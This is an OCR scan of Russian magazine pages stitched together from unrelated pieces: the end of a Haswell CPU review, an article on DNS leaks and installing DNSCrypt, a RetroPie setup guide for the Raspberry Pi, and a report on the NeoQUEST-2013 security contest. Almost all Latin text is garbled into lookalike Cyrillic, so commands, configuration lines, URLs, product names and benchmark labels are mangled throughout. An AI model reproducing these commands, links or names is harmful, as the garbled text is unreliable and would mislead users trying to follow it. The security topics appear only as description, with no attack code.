дачка сложная, с учетом того, какие обороты на- 
брала британская АВМ. Так что техноманьякам 
и энтузиастам придется довольствоваться тем, 
что есть. Мы, откровенно говоря, расстроены. 
Однако окончательное впечатление о Назме! 
должно сложиться после знакомства с ноутбуч- 
ными «камнями» и предложениями для мобиль- 
ного сегмента. 


Не забываем, что в сегменте х86-вычислений 
все никак не может навязать нормальной конку- 
ренции, по сути, единственный противник ее! — 
АМО. А как известно, конкуренция — двигатель 
прогресса. Поэтому мы с нетерпением ждем 
анонса АМО З{еагтгойег. 

А пока констатируем тот факт, что обладателям 
систем на базе Запау Виаде, Запау Впаде-Е и Му 
Впаде элементарно нет никакого смысла перехо- 
дить на Назме!. Прирост производительности — 
мизерный (в случае с шестиядерными Запау 
Внаде-Е в многопоточных приложениях его нет 
вовсе). При этом к новому процу потребуется до- 
купить материнку на базе логики 287/Н87 Ехргез$. 
На момент тестирования процессора самой де- 
шевой платой, если верить ресурсу «Яндекс.Мар- 
кет», считалась МЗ! Н87М-ЕЗЗ стоимостью 2500 
рублей. Прибавляем стоимость «матери» к стои- 
мости процессора. Нетрудно догадаться, что ре- 
шение посерьезней, которое позволит еще и ра- 
зогнать Назмей!, будет стоить как минимум вдвое 
дороже. Хорошо, что хоть кулеры с поддержкой 
-@А1155/1156 совместимы с ЕСА1150. Хотя, к раз- 
гону Назме!, кстати, тоже есть претензии. = 


ИСТОРИЯ ПОВТОРЯЕТСЯ 


И снова у те! возникли проблемы с чипсетами. На этот раз неприятная оказия 
может произойти с ЦЗВ 3.0. Дело в том, что микросхемы ревизии С1 во время 
вхождения системы в режим сна могут переставать видеть некоторые порты. 


Во время пробуждения УЗВ-разъемы снова определяются. Ошибка некритич- 
ная, однако с обновлением ревизии до версии С2 будет исправлена. 

Напомним, что одновременно с анонсом Запау Впаде была обнаружена 
ошибка чипсета Р67 Ехрге5$, в котором некорректно работали порты ЗАТА ИП. 
ще! достаточно оперативно выпустила новую ревизию микросхемы, а произ- 
водители материнских плат — устройства с приставкой ВЗ. 
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МРЕИМЕ 1.55 1024М, С 


и\е! Соге 15-4670К 

ще! Соге 17-3770 

|{е! Соге 17-3960 

ие! Соге 17-2600К 

ще! Соге 15-2500К 

и{е! Соге 15-2400 

АМО ЕХ-8150 

АМО Рпепот И Хб 1090Т ВЕ 


АМО Рпепот 1 Х4 970 ВЕ 


АМО А8-3850 


500 


Сравнение процессоров вммРите 


МИМВАВ, КБ/С 
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Сравнение процессоров в\М/ИтВАВ 


ЗОМАВК ЕВЕ ЗТЕИКЕ, БАЛЛЫ 


НО Сгар№!с$ 4600 (Соге 15-4670К) 


| | 
НО бгаригсз 4000 (Соге 7-3770) ООС ЧЕКЕ ЧЕКЕ ЧК ЧК ЧК ЧЕКОВ ОЧКО 
| 


Вадеоп НО 86700 (АМО А10-6700) 


0 200 400 600 800 1000 1200 


Сравнение НО СгарШс$ 4600 с НО Сгаршс$ 4000 и Вадеоп НО 86700 вбенчмарке ЗОМагк Епе ЗиКе. 
Каквидишь, встроенное видео «камней» п\е! прилично уступаетграфике АРУ АМО 
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ВКРАТЦЕ О ОМЗСВУРТ 

При использовании НТТР$ или $5ЁЕ твой НТТР- 
трафик зашифрован, то есть защищен. Когда 
ты используешь УРМ, шифруется уже весь твой 
трафик (конечно, все зависит от настроек \РМ, но, 
как правило, так оно и есть). Но иногда, даже ког- 
да используется \УРМ, твои ОМ$-запросы не за- 
шифрованы, они передаются как есть, что откры- 
вает огромное пространство для «творчества», 
включая МПМ-атаки, перенаправление трафика 
и многое другое. 

Тут на помощь приходит опенсорсная утили- 
та ОМ$Сгурф, разработанная хорошо известными 
тебе создателями ОрепбМ$, — программа, по- 
зволяющая шифровать ОМ$-запросы. После ее 
установки на компьютер твои соединения так- 
же будут защищены и ты сможешь более без- 
опасно бороздить просторы интернета. Конечно, 
ОМ$Сгур{ — это не панацея от всех проблем, 
а только одно из средств обеспечения безопас- 
ности. Для шифрования всего трафика все еще 
нужно использовать \/РМ-соединение, но в паре 
с ОМЗСгур{ будет безопаснее. Если тебя такое 
краткое объяснение устроило, можешь сразу пе- 
реходить к разделу, где я буду описывать установ- 
куи использование программы. 


ОМУСВУРТ 


НРЯЧЕМ 
ОМ-ГРАФИК 


Зашита Р№-соединений 


для параноиков 


Используя \РМ, ты думаешь, что за то- 


бой никто не подсматривает и передава- 


У 


емые данные защищены? Ты ошибаешь- 


ся. Сейчас попробую объяснить почему. 


ДЛЯ НАСТОЯЩИХ ПАРАНОИКОВ 

Попробуем разобраться глубже. Этот раздел 
предназначен для настоящих параноиков. Если 
ты ценишь свое время, тогда можешь сразу 
перейти к установке программы. 

Итак, как говорится, лучше один раз увидеть, 
чем сто раз услышать. Посмотри на рисунок 1. До- 
пустим, клиент (ноутбук на рисунке) пытается об- 
ратиться к АКм/5.огд.иа. Первым делом он должен 
разрешить символьное имя узла в !Р-адрес. Если 
же конфигурация сети такова, что используется 
ОМ$-сервер провайдера (незашифрованное со- 
единение, красная линия на рисунке), то разре- 
шение символьного имени в !Р-адрес происходит 
по незашифрованному соединению. 

Да, какие данные ты будешь передавать 
на АКм/5.ога.иа, никто не узнает. Но есть несколь- 
ко очень неприятных моментов. Во-первых, про- 
вайдер, просмотрев логи ОМ$, сможет узнать, 
какие сайты ты посещал. Тебе это нужно? Во- 
вторых, вероятна возможность атак ОМ№$-спуфинг 
и ОМ5-снупинг. Подробно описывать их не буду, 
об этом уже написано множество статей. В двух 
словах ситуация может быть следующей: некто 
между тобой и провайдером может перехватить 
ОМ$-запрос (а так как запросы не шифруются, 


Денис Колисниченко 


Чи$Наб$@атай.сот 


то перехватить запрос и прочитать его содер- 
жимое не составит никакого труда) и отправить 
тебе «поддельный» ответ. В результате вместо 
того, чтобы посетить ЧКм/$.огд.иа, ты перейдешь 
на сайт злоумышленника, как две капли воды по- 
хожий на тот, который тебе нужен, введешь свой 
пароль от форума, ну а дальше развитие событий, 
думаю, ясно. 

Описанная ситуация называется ОМ$ еаКта 
(«утечка ОМ$»). ОМ$ 1еакта происходит, когда 
твоя система даже после соединения с \РМ- 
сервером или Тог продолжает запрашивать ОМ$- 
серверы провайдера для разрешения доменных 
имен. Каждый раз, когда ты посещаешь новый 
сайт, соединяешься с новым сервером или запу- 
скаешь какое-то сетевое приложение, твоя систе- 
ма обращается к ОМ$ провайдера, чтобы разре- 
шить имя в [РВ итоге твой провайдер или любой 
желающий, находящийся на «последней миле», 
то есть между тобой и провайдером, может по- 
лучить все имена узлов, к которым ты обраща- 
ешься. Приведенный выше вариант с подменой 
|Р-адреса совсем жестокий, но в любом случае 
есть возможность отслеживать посещенные то- 
бой узлы и использовать эту информацию в соб- 
ственных целях. 
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Если Ты «боишься» своего провайдера или 
просто не хочешь, чтобы он видел, какие сайты 
ты посещаешь, можешь (разумеется, кроме ис- 
пользования \УРМ и других средств защиты) до- 
полнительно настроить свой компьютер на ис- 
пользование ОМ$-серверов проекта Ореп0мМ$ 
(мимим/.орепап$.сот). На данный момент это сле- 
дующие серверы: 

. 208.67.222.222; 
’ 208.67.220.220. 


При этом тебе не нужно никакое другое до- 
полнительное программное обеспечение. Про- 
сто настрой свою систему на использование этих 
ОМ№ 5-серверов. 

Но все равно остается проблема перехва- 
та ОМ$-соединений. Да, ты уже обращаешь- 
ся не к ОМ$ провайдера, а к Ореп0№$, но все 
еще можно перехватить пакеты и посмотреть, 
что в них. То есть при желании можно узнать, к ка- 
ким узлам ты обращался. 

Вот мы и подошли к ОМ$ЗСгурт. Эта про- 
граммулина позволяет зашифровать твое ОМ$- 
соединение. Теперь твой провайдер (и все, кто 
между тобой и им) точно не узнает, какие сайты 
ты посещаешь! Еще раз повторюсь. Эта про- 
грамма не замена Тог или \УРМ. По-прежнему 
остальные передаваемые тобой данные переда- 
ются без шифрования, если ты не используешь 
ни \/РМ, ни Тог. Программа шифрует только ОМ$- 


трафик. 


ОМУТЕАК 

Сайт — ПИрэ://Лмммм.апЗеакКе.сот позволяет 
определить «утечку» ОМ$ и объясняет, как от нее 
избавиться. Просто зайди на этот сайт. Нажав 
кнопку Спеск ог ОМ$ [еак$ пом, ты получишь спи- 
сок ОМ№$-серверов, через которые могут прохо- 
дить твои запросы. Следовательно, ты увидишь, 
кто именно может узнать, какие сайты ты посеща- 
ешь (рис. 2). 

Как показано на рис. 2, владельцы 12 ОМ$- 
серверов имеют возможность записывать все по- 
сещенные мною сайты. Но поскольку я работаю 
через Тог, то меня этот вопрос мало беспокоит. 

На страничке ои./у/1ситаа/ описано, как ис- 
править эту уязвимость (то есть что сделать, чтобы 
после подключения к \/РМ твоя система использо- 
вала ОМ$-серверы \УРМ-провайдера, а не твоего 
интернет-провайдера). Повторять все это не вижу 
смысла, поскольку любой справится с пошаговой 
последовательностью действий. 


УСТАНОВКАИ ИСПОЛЬЗОВАНИЕ 
ОМЗСВУРТ 

Самый простой способ защитить свое ОМ$- 
соединение — это использовать ОМ$ЗСгурт. Мож- 
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Рис. 1. Зашифрованное УРМ- 
соединение (зеленая линия) 
инезашифрованное соединение 
сОМ№$-сервером провайдера 
(красная линия) 


ТН раде зНомз {Пе ОМ№ зегуегз {ВаЁ уоиг сотрикег 15 итд Ко гезоме О№5 патез. ТВе омипегз оЁНе зегуегз Изед 
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УРМ-сервер 


ОМ№$ провайдера 


АКм/$.огд.иа 


но, конечно, следовать рекомендациям от ммм. 
опзеаЖез$1.сот, а можно пойти по пути наи- 
меньшего сопротивления и просто установить 
ОМ$Сгуру. 

Первым делом качаем сам ОМ$Сгурт (ВИ рз:// 
а{пиб.сот/орепап$/Апзсгур{-мип-спеп{). Я сразу 
привел ссылку на СИНиб, откуда можно скачать 
программу. Если хочешь получить о ней допол- 
нительную информацию, тогда тебе сюда: Би.Пу/ 
м@хВ. Чтобы скачать программу с СОЙНиЬ, нажми 
кнопку Оомпюаа Р. Будет загружен архив с ис- 
ходниками ОМ$ЗСгур. Уже откомпилированная 
версия находится в каталоге ОМ$ЗСгурт архива. 
Распакуй файлы. В принципе тебе нужен только 
один файл — апзсгур-ргоху.ехе. Он находится 
в том самом каталоге. Все остальное (исходники) 
можно удалить. 

Но это еще не все. Если ты уже погуглил, то, 
значит, видел скриншоты ОМ$ЗСгурт. Запустив 
апзсгур{-ргоху.ехе, ты понял, что что-то не то. 
Программа запустилась в окне командной стро- 
ки. Все правильно, ты скачал сам прокси, атеперь 
еще нужно скачать к нему оболочку. На СИНиЬ 
есть еще один проект — необходимая нам обо- 
лочка (БЁ.1у/АОхаа0). 

Аналогичным образом скачай /ИР-архив, 
распакуй его куда-нибудь. В каталоге Ыпапе$/ 
Ваеа$е/ будет программа апзсгур{-мипсИепт.ехе. 
Скопируй этот файл в каталог, в котором находит- 
ся файл апзсгур{-ргоху.ехе. 

Осталось только запустить апз$сгур{-ргоху. 
ехе. В появившемся окне выбери сетевые адап- 


теры, которые нужно защитить, и нажми кнопку 
Зач. Если все нормально, тогда возле кнопки 
Зор (в нее превратится кнопка За“) появится 
надпись ОМЗСгуру 1$ пипптоа (рис. 3). Кстати, об- 
рати внимание, что интерфейс для О$ Х выглядит 
несколько иначе (клиент для ОЗ Х можно взять 


здесь: БК./у/гСМро1). 
ВКАЧЕСТВЕ ЗАКЛЮЧЕНИЯ 


Статья получилась не очень большая, поскольку 
сама программа очень проста в использовании. 
Но она была бы неполной, если бы я не упомя- 
нул и о \УРМ. Если ты прочитал эту статью, тебя 
она заинтересовала, но ты еще не пользуешь- 
ся услугами \УРМ-провайдера для шифрова- 
ния своих данных, то самое время это сделать. 
УРМ-провайдер предоставит тебе безопасный 
туннель для передачи твоих данных, а ОМЗСгур{ 
обеспечит защиту ОМ$-соединений. Конечно, 
Зесищук!$5 платный (бесплатный тарифный 
план можно использовать разве что для озна- 
комления), но ведь за безопасность нужно пла- 
тить? 

Можно использовать, конечно, и Тог (о кото- 
ром уже писалось в одном из предыдущих выпу- 
сков), но Тог работает относительно медленно, 
и это, как ни крути, не УРМ — весь трафик «то- 
рифицировать» не получится. В любом случае 
(какой бы вариант ты ни выбрал) теперь твои 
ОМ№$-соединения защищены. Осталось только 
определиться со средством шифрования трафи- 
ка (если ты это еще не сделал). = 


Заес+ пемо демсез гогизе мн ОМ$СгурЕ 


| Вгоадсот Миша! \Игаезз Адартег Руд: (Алотавс) Руб: (Ашотавс) 


Сетевой адаптер Вгоадсот 802.11п - |Ру4: (Алотайс) 1Руб: (АЧютабс) 


Вгоадсот МеНпк (ТМ) @дабй Еете! - |Ру4: (Алюотайс) |Руб: (Ачютайс) 


(_) ЕпаЫе рагепёа| сопнов 


сомалтю 


Рис. 2. Список ОМ№$-серверов 


Рис. 3. ОМ$Сгур запущен 


ЭРоми М9деп адарЁегз 


АА 


АСЕ аз а дайемау демсе [Г] 


0№$ зпоорто: 
БН. 1/18 хОА4у 


0№ 5$ зроойпод: 
еп.мик'ред!а.ога/миКиИ 
0№_5рооНпа 


НОСТЬ. 
а 


|} - г Б 
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Преврашаем малиновый микрокомпьютер 
в универсальную ретроконсоль 


До выхода пеждеп-консолей остался месяц с лишним, и весь мир готовится к новым ВаНейеа’ам 
и НЕАмм. Если тебя все это не возбуждает, у тебя есть возможность прямо сейчас приобщиться 
к вечным ценностям. Давай посмотрим, как твой Вазрбегту Р!' поможет тебе в этом деле. 


очему именно Разрбегту Р!? Разумеется, ты можешь 

запустить эмулятор почти на любом устройстве. 

В большинстве случаев ты даже сможешь вывести 

картинку на большой экран и воспользоваться любым 
джойстиком. Но хочется получить все удобства работы с при- 
ставкой. Это значит: никаких клавиатур и мышей, возможность 
выполнять все, что нужно, с джойстика и высокая скорость за- 
грузки. Низкое энергопотребление и бесшумность позволяют 
держать НРазрбеггу Р! всегда включенным, так что последний 
пункт вычеркиваем. Мощности «малинки» хватит для всего, 
кроме разве что Р$1 (но, уверен, это скоро изменится благо- 
даря проектам вроде РЗХ НеААМеч). А со всем остальным нам 
на помощь придет проект ВетоАгсй и его графическая над- 
стройка Етиайоп Зайоп! 


ЧТО НАМ ПОНАДОБИТСЯ 

Во многом придется повториться: очень желателен корпус (они 
сейчас доступны по 300-400 рублей), а подходящий зарядник 
у тебя почти наверняка уже есть. Наконец, понадобится $0- 
карта. Чем выше класс — тем лучше, тем более что 32-гиговые 
карты 10-го класса стоят довольно мало. Также желателен \\- 
А-адаптер. Я пользуюсь ТР-ММК ТЕ-\М/М725М. В отличие от ме- 
диацентра, для игровой системы качество канала не критично, 
но само подключение необходимо (зачем — мы поговорим чуть 
позже). 


\МЕАРОМ ОРСНО!СЕ 

Самому важному железному компоненту я решил отвести от- 
дельную главу. Конечно же, речь пойдет о геймпаде. Какой луч- 
ше выбрать? 

За последние 10-15 лет консоли заметно изменились, и это 
отразилось на их контроллерах. В первую очередь речь идет 
о крестовине, которая сейчас остается важной только в очень 
специфичных жанрах. В старых играх же крестовина была глав- 
ным элементом. Взять хотя бы диагональные движения: стрель- 
ба«вверх-вправо» в Сотга нужна очень часто, и тут важно четкое 
срабатывание. Кроме того, Мищепао до последнего удавалось 
удерживать патент на классическую крестовину. Мсго5о[, Зопу 
и прочим приходилось изгаляться по-всякому. Насколько я по- 
нимаю, фанатам Зопу в этом смысле повезло больше — у них, 
в отличие от Мгсгозой, крестовина разделена и поэтому работа- 
ет четко. Короче говоря, покупка УЗВ-клона ретроконтроллера 
на Ататоп’е в этом контексте не кажется блажью. 

Но с другой стороны, клон МЕ$-контроллера точно не подой- 
дет для ЗМЕ$ или Зеда Медаайуе — у него банально не хватит 


<> / 
У” 
ь 
Илья Илембитов 


НетбКоу@геа!.хакКер.ги 


ШМЕО 


Можно использовать 
до четырех джойсти- 
ков, но тогда придется 
задействовать У5В-хаб 
свнешним питанием. 


кнопок. Забегая вперед, скажу, что нам понадобятся дополни- 

тельные клавиши на джойстике, если мы не хотим использовать 

клавиатуру для выхода из эмулятора и других дополнительных 
функций. В этом смысле прелесть контроллера отР$3 или Хбох 

360 в том, что клавиш точно хватит. 

Опять-таки если у тебя уже есть игровая приставка, то на- 
верняка есть и геймпад. Завести контроллер ХБох 360 или Р$3 
относительно просто. 

У фанатов Зопу в данном случае есть большой плюс — их 
джойстик универсален и может подключаться как по стан- 
дартному Вост, так и по ЦЗВ. С другой стороны, драйвер 
для Оича5Воск придется качать и собирать своими руками, 
а драйвер для Хбох доступен в родном репозитории. 

Другой плюс контроллера от Хбох в том, что если потом за- 
хочется поиграть на РС, то у него поддержка в играх намного 
лучше, чем у Виа! 5поск’а. Жирный минус в том, что контроллер 
от ХБох 360 работает по проприетарному беспроводному про- 
токолу и разъем у него отличается от ЦЗВ. 

По себе знаю, что выбор джойстика — почти религиозный 
вопрос. Поэтому хотя с практической точки зрения удачнее 
Оцапоск, но, если ты привык к Мсго$оН-овскому контролле- 
ру, ты все равно сделаешь все, чтобы пользоваться им. Тут есть 
три варианта: 

1. Купить специальный и довольно редкий беспроводной ИУЗВ- 
адаптер ММге!е$$ Сатта Ресемег Тог ММпао\м$ РС, стоит око- 
ло 1300 рублей. 

2. Купить специальный и менее редкий УЗВ-провод для за- 
рядки беспроводного джойстика Р!ау & Спагде КИ. Прода- 
ется в комплекте с аккумулятором, стоит около 700 рублей. 
Длина кабеля — 2,7 м. 

3. Купить проводной джойстик (около 1500 рублей). Длина ка- 
беля — все те же 2,7 м. 


В общем, если у тебя не очень большая гостиная, логичнее 
всего купить Р!ау & Спагде КИ. Все-таки в быту аккумулятор на- 
много полезнее, чем все остальное. Ну ау меня уже был прово- 
дной контроллер ХБох, поэтому говорить буду о нем. 


РАЗВОРАЧИВАЕМ СИСТЕМУ 

Все, о чем дальше пойдет речь, стало возможным благодаря 
проекту ВегоАгсп. Это фреймворк, объединяющий кучу эмуля- 
торов для различных систем, от МЕ$ до Р$Х и ОО$. Благодаря 
ему нам не придется, например, отдельно настраивать управ- 
ление в каждом эмуляторе. Вазрбегту Р! активно поддержива- 
ется, и существует специальный скрипт (5(.1у/18ЦШВерР), по- 


Атап 2600 


.а26.А2б .бт .ВИМ „гот .ВОМ .7р .1Р .92.07 


‚сп .СВТ .464 .064 .064 .664 164 164 дар ТАР хб64. .Х64 р .7Р 


5еда Меда Опуе / Сепе$!$ ‚та .5МО „бт .ВИМ 


Зопу Р!ау{аНоп 1 (ПО МС .72.72.рор.РВР.Б .ВМ 
Зирег Ми|епао .5тС .5РС .Пд .5мС .ЗМС .ЗЕС .Н@ .5\М/С 


Форматы, поддерживаемые эмуляторами Ве гоР!е 


При загрузкеты увидишь вот такой сплешскрин 


до 


аж! +0 


> 


зволяющий довольно просто установить его на официальный 
дистрибутив Вазрмап. Все действительно просто, но довольно 
долго. Мы пойдем более легким путем и возьмем специаль- 
ный образ ( ). По сути это и есть стандартный 
Вазрыап, только с уже установленными эмуляторами. 

Скачай образ любым удобным способом и залей его на $0- 
карту. Под \Мтао\м/$ ты можешь использовать \\ММп32 О1$К |тадег 
( ), апод ИМпих и ОЗ Х воспользуйся стандартным аа: 


44 1+=ВетгоР1еТтаёе* о+=/аеу/зах_Ь6$=1М # Для 1 
44 1+=ВеегоР1еТтаре* о+=/аеу/га1$КМ 6$=1М # Д/ 


Обрати внимание, что заливать нужно не в раздел, а в ко- 
рень диска (то есть /Аем/зас, а не /4е\м/5ас1). Макинтошникам 
стоит обратить внимание на приставку г (г@!$К вместо 41$К) — 
этот режим значительно ускоряет запись данных. 

Итак, записали диск, вставили в Назрбеиту. Подключаем за- 
рядку, сетевой кабель и НОМ1. Войдем в систему по З$Н: 


55№ р1@192.168.1.209 — — 
Воткни \ММ-Н-адаптер и контроллер. Теперь настроим М-Н 
самым простым способом. 


$и4о папо /ефс/пеЕмогК/1п{егРасе$ 
ачфо 1о 

1Расе 1о 1пеф 1Тоорбаск _ 

1Расе ефИ@9 1пее апср 


т 10 


Так ВеНноАгсв 
видиттвой 
джойстик 


У\УАВММС 


Выставлять очень вы- 
сокие значения частоты 
процессора не реко- 
мендуется — это может 
привести кнарушению 
целостности данных 
на карте. Кроме того, 
в{Етианоп З{айоп могут 
быть лаги. 
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а11]1ом-По%р1и5 м1ап@ 

ацфо м1ап@ 

1Фасе м]1ап@ 1пеф аЙср 
мра-$$149 "$514" _ мя 
мра-рзК "раззмога" # Па 


Атеперь займемся настройкой геймпада ХБох: 


5и4о ар*-вее ирда*е | 
5и4о арф-веф 1п$а11 хбохагу 
5и4о папо /ефс/гс.1оса1 


хбохагу --Ег1врег-аз-Би оп --1а 9 --1еа 2 +: 
--еаЧгопе 40009 --$511еп{ & $1еер 1 

хбохаг\у --+г155ег-аз-Би®оп --14 1 --1е4 3 +: 
--деаЧтопе 4000 --$11еп{ & $1еер 1 

хбохаг\ --+г155ег-а$-Би®оп --14а 2 --1е4 4 «+ 
--еаЧгопе 4000 --$11епЕ & $1еер 1 — —_ 
хБохг\у --Ег18рег-а$-БиФоп --1а 3 --1еа 5 «=! 
--еадтопе 4000 --$11еп{ & $1еер 1 


Обрати внимание на опцию --14. Для беспроводного джойстика 
нужно использовать --\мл4. 
Теперь зайдем в настройки самого Вазрбеиту: 


5идо га$р1-сопйв 
По умолчанию системе не доступно все дисковое про- 


странство. Для того чтобы это изменить, выбери пункт Ехрапа 
ЕИезу$4ет. Во-вторых, можно поиграться с настройками про- 
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изводительности. Тут стоит поэкспериментировать, единого 
варианта нет. Я не трогал частоту процессора (пункт О\мегсоск), 
но менял распределение памяти между оперативной и гра- 
фической (Адуапсеа —› Метогу Эр) на 256/256. После того 
как ты закончишь с настройками, система предложит тебе 
перезагрузиться. Согласись. При перезагрузке можешь выдер- 
нуть сетевой кабель — подхватится \М/-Е. 

Если все пошло как надо, то после загрузки на твоем гейм- 
паде кружок вокруг Х перестанет мигать и засветится первый 
сегмент. Это значит, что джойстик определился как первый 
в системе. При первом запуске ЕтуцаНоп Зайоп предложит 
тебе настроить управление на джойстике, тут все довольно 
прозрачно. 

Итак, ты в главном меню. Переключение между эмулято- 
рами происходит по нажатию стрелок вправо-влево. Сначала 
ты можешь прийти в ступор — почему доступен только Воот, 
Оике Микет, ОО$, Арре Ни Зеда? Дело в том, что большинство 
эмуляторов будут доступны только тогда, когда в их папках по- 
явятся файлы ромов. И вот сейчас ты поймешь, зачем был ну- 
жен \Л-Е!! 

На своей основной системе подключись к ЕТР-серверу 
с |Р-адресом твоей «малинки» (на всякий случай: после пере- 
хода на \ММ-Е! он точно будет другой). Здесь ты увидишь акку- 
ратную структуру папок с именами систем. Учти, что каждый 
эмулятор поддерживает вполне конкретный набор форма- 
тов. На прошлом развороте я привел табличку для основных 
эмуляторов, а полный список ты найдешь в файле /Поте/ри. 
етцайоп{аНоп/ез_зуетз.ста. В общем, главный момент — 
в большинстве случаев не нужно заливать ромсеты из Р- 
файлов. Потратишь кучу времени, а потом еще будешь сильно 
и неприятно удивлен. 

После того как ты залил нужный ВОМ, нужно обновить 
ЕтиаНоп ЗфаНоп. Для этого на геймпаде (при стандартной 
конфигурации) нужно нажать З{а[ и выбрать Веюоаа. Вуаля — 
соответствующий эмулятор активировался и ему видны твои 
ромы. 

Но не спеши загружаться. По умолчанию ЕтшайНоп ЗтайНоп 
не позволяет выходить из эмулятора в основное меню с гейм- 
пада. И тут начинается самый интересный момент — ручная на- 
стройка кнопок джойстика. 

Подключайся по ЗЗН, набирай: 


5и4о папо -/КефтгоР1е/сопй 55 /а11 /гефгоагсИ. с+в 


Добавь в конец файла 


1при*_ех1{ ети1Тафог_ах1$ = -5 


Это позволит тебе выходить из эмулятора при нажатии 
«вверх» на крестовине. Но можно сделать еще круче! 
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ШМЕО 


Если не настроить кноп- 
ку выхода, то покидать 
эмулятор придется 
спомощью ребута. 
Из-зачастых переза- 
грузок запросто может 
нарушиться целостность 
карты, и придется заново 
заливать образ. 


ШМЕО 


УВетоР!е есть свой от- 
дельный конфигуратор: 


са —/ВефгоР1е-5ефир/ 
5и4о ./гефгор1е_ 
зефир. $И 


Отсюдаты можешь 
обновить эмуляторы 
и поковыряться в раз- 
ЛИЧНЫХ ОПЦИЯХ. 


т 


зауей1е_41гесфогу = /поте/р1/КетгоР1е/зауезфафе 
зауефа{е_Ч1гесфогу = /поте/р1/КеегоР1е/+ = 
сауе$Та®е 

°сгееп$Но{_41гесфогу = /Поте/р1/ВеегоР1е/+ = 
°сгееп$Иот$ 

ачфо5ауе_1п%егуа1 = 300 

1при*_ех1{_ ети1Тафог_ах1$ = -5 

1при{ зауе_$Фафе_ах1$ = +4 
1при*_Тоа4_5фафе_ах1$ 
1при{_зсгееп$По*_ах1$ 


И 
| 
ь 


И 
+ 
л 


Итак, с помощью крестовины ты сможешь выходить из эму- 
лятора, делать сохранение (вправо), загружать сохранение 
(влево), делать скриншот (вниз). Еще можно подстраховаться, 
для этого вставь перед прш ех{ё етиатюг ах!$ строчку: 


1при{_епаб1е_По{Кеу_6п = 10 


Теперь перед каждым действием, назначенным после 
этой строчки, нужно будет зажать большой Х. На всякий слу- 
чай я приложил схему кнопок с точки зрения конфига. Каждый 
элемент имеет суффикс (ЫШп или ах!5) и номер (5, 10 или +4 
для стрелок/джойстиков). Чтобы сохранения и скриншоты за- 
работали, не забудь создать папки: 
5иао тКка1г /Поте/КетгоР1е/{ амезате , зсгееп5По{$ 

После того как ты закончил все это править, не забудь снова 
перегрузить эмулятор. На самом деле настроек намного боль- 
ше. Как минимум есть еще ускоренный режим: шрщ {4099/е_ 
Таз Тогммага назначает клавишу, переключающую его при на- 
жатии, при _По!4 Таз{ югмага — при удержании. В интернете 
можно ознакомиться с полным списком опций (0И.1у/1АЕМРСТГ). 


НАВОДИМ КРАСОТУ 
Итак, остались мелочи. Во-первых, можно отключить ненужные 
эмуляторы. Для этого полность закомментируй их секции фай- 
лев /Поте/р/.етиаНнопаНоп/е зузетз.ста. Заодно можешь 
закомментить и секцию при Соп{о! — все равно для любой ре- 
ально задачи тебе придется лезть в конфиг. 

Во-вторых, в поставке РагоРге есть скрипт, который автома- 
тически ищет обложки к играм. Для этого запусти: 


5идо ру{Поп -/КефгоР1е/зирр1етепфагу/Е$ -сгарег/-> 
°сгарег.ру -сгс 


Опция сгс позволит искать не по названиям, а по сигнатурам 
файлов. Понятно, что это более длинный процесс, но зато это 
проще, чем вручную называть файлы так, чтобы понял скрипт. 
Вот, пожалуй, и все. 2 


ВНИМАНИЕ: МЫ ИЩЕМ НОВЫХ АВТОРОВ! 


ЕСЛИ ТЕБЕ ЕСТЬ ЧТО СКАЗАТЬ, ТЫ МОЖЕШЬ ВОЙТИ В КОМАНДУ ЛЮБИМОГО ЖУРНАЛА. 
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Во время легендарных Петербургских белых ночей в знаменитом своими 
прекрасными фонтанами Петродворце прошел финал М№еоОЧЕЗТ-2013 -— 
ежегодного соревнования по кибербезопасности, проводимого компанией 


НеоБИТ. Мероприятие прошло в рамках 22-ой научно-технической конференции 
«Методы и технические средства обеспечения безопасности информации». 
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МНЕООСЧЕЗТ-2013 
ОЧНАЯ СТАВКА 


Как прошел финал конкурса М№ео ОПЕЗ$Т-2013 


В финале победители февральского отборочного тура 
МеодЧЕЗТ-2013 боролись за главный приз — поездку на одну 
из международных конференций. Победителем стал один 

из лучших участников хак-квестов России Виктор Алюшин 
(А\Лстог), который выбрал поездку на конференцию ВАЗА 


в Амстердам. 


ПУТЬ КПОБЕДЕ 

Легенда квеста была поистине захватывающей — 
участникам нужно было совершить побег изтюрь- 
мы, уложившись в какие-то восемь часов, иначе 
их ждала казнь на вполне себе правдоподобном 
электрическом стуле. Квест был пройден далеко 
не всеми, но не переживайте, никто из участников 
не пострадал. 

В первом задании участники сражались 
с грозным противником — гипервизором. Им 
нужно было достать ключ из программы, проде- 
монстрировав свои навыки геуегзе епдтеейпд. 

Во втором задании предлагалось преодолеть 
двухфакторную аутентификацию, перепрошив 
М!РААЕ-карточку, реализовав ВтазоОоЁЕ и Х$$ 
в сочетании с социнженерией и преодолев си- 
стему распознавания образов. 

Самым сложным оказалось третье задание, 
в котором нужно было получить доступ к серверу 
пожарной сигнализации «тюрьмы», продемон- 
стрировав знания стандартных криптографиче- 
ских протоколов и специфических криптоатак. 

В четвертом задании требовалось обойти 
аутентификацию с ЧУЗВ-ключом, запрограмми- 
ровав на контроллере Агаипо сверхоптимизиро- 
ванный по памяти алгоритм умножения матриц. 

В пятом задании участникам предстояло «уг- 
нать» ботнет: изначально каждому конкурсанту 
предоставлялся один бот, анализируя алгорит- 
мы работы которого нужно было собрать ключи 
от всех остальных ботов сети. 
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Влад Росков (второе место) и Виктор Алюшин (первое место) 


ТЕЛЕВИЗОР-ШПИОН, ИЛИ ОПАСНОСТИ 
ИСПОЛЬЗОВАНИЯ РИСОВАРОК 

Пока хакеры пытались сбежать из тюрьмы, зри- 
тели не только наблюдали за ними, но и слушали 
интересные доклады, подготовленные экспер- 
тами по кибербезопасности компании НеоБИТ. 
Кроме того, специально для МеоОЧЕЗТ высту- 
пления подготовили студенты отделения кибер- 
безопасности Санкт-петербургского политеха, 
в очередной раз продемонстрировав традицион- 
но высокий уровень подготовки студентов и вы- 
пускников кафедры ИБКС, чьи статьи, кстати, 
можно встретить практически в каждом номере 
«Хакера». 

Доклад с таинственным названием «Крото- 
вые норы в компьютерных джунглях: пентест 
масштабных информационных систем» раскрыл 
специфику проведения пентестов информацион- 
ных систем национального масштаба. 

Киберугрозу с неожиданной стороны показал 
увлекательный доклад «Атаки на современную 
бытовую технику: телевизор-шпион и опасности 
использования рисоварок». При этом проводи- 
лась живая демонстрация удаленного перехвата 
управления телевизором, в которой мог участво- 
вать любой желающий. 

Доклад «Выявление скрытых гипервизоров 
с помощью анализа влияния аппаратной вирту- 
ализации на работу кеша процессора» познако- 
мил слушателей с оригинальным методом выяв- 
ления гипервизора. 
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Логотип кафедры инфор- 
мационной безопасности 
